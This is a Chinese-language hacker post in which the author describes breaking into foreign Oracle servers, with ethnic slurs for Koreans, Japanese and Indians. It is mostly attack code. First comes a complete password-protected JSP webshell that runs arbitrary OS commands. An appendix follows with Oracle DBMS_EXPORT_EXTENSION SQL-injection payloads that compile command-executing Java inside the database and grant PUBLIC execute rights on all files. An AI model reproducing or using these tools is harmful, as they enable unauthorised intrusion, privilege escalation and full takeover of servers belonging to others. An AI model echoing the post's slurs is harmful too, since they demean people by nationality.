最近遇到些国外的oracle服务器,其中好多系统的内核无法local root,但是有在root权限下跑的java的web服务,有在web目录写权限,但是经常用的jshell是GBK的,在国外(先是棒子,放过了,后有小鬼子,再后来还有阿三,实在受不了了,自己改一个)的机器上基本不支持该字体,没办法自己改了一个cmd的webshell多加了一个密码认证。
------------------------------代码分割线------------------------------
<%@ page import="java.io.*" %>
<%
//by: vitter@safechina.net
String PASS = "vitter";
String cmd = request.getParameter("cmd");
String pass = request.getParameter("pass");
String output = "";
if (pass != null && pass.trim().length() > 0) {
if (pass.equals(PASS)) {
output = "Success";
request.getSession().setAttribute("loginUser", "loginOk");
} else {
output = "password ERR!";
request.getSession().removeAttribute("loginUser");
}
} else if (cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((s = sI.readLine()) != null) {
output += s;
}
}
catch (IOException e) {
e.printStackTrace();
}
}
boolean ifLogin = false;
Object loingUser = request.getSession().getAttribute("loginUser");
if (loingUser != null) {
ifLogin = true;
}
%>
<FORM METHOD=POST ACTION='vittercmd.jsp'>
<%
if (!ifLogin) {
%>
Password:<INPUT name='pass' type=password>
<%
} else {
%>
CMD:<INPUT name='cmd' type=TEXT>
<%
}
%>
<INPUT type=submit value='Run'>
</FORM>
<hr>
<pre>
<%=output %>
</pre>
附:oracle提权的小技巧
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(filename.startsWith("http")?new InputStreamReader(new URL(filename).openStream()):new FileReader(filename));
String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual ;
